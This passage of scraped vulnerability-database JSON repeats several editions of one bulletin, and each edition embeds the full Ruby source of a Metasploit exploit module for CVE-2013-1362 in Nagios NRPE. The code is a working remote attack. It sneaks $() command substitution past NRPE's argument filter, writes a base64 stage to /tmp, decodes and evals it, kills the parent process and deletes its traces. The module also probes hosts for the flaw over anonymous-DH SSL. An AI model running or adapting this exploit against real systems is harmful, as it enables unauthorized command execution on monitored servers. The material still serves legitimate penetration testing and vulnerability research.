self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-20T05:38:35", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-12-31T11:57:46", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2017-12-31T11:57:46"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-12-31T11:57:46", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-12-31T13:55:58", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2017-12-31T13:55:58"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-12-31T13:55:58", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-07T14:01:46", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-07T14:01:46"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-07T14:01:46", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-07T16:01:32", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-07T16:01:32"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-07T16:01:32", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-15T08:01:40", "history": [], "viewCount": 17, "enchantments": {"score": {"value": null, "modified": "2018-01-15T08:01:40"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n 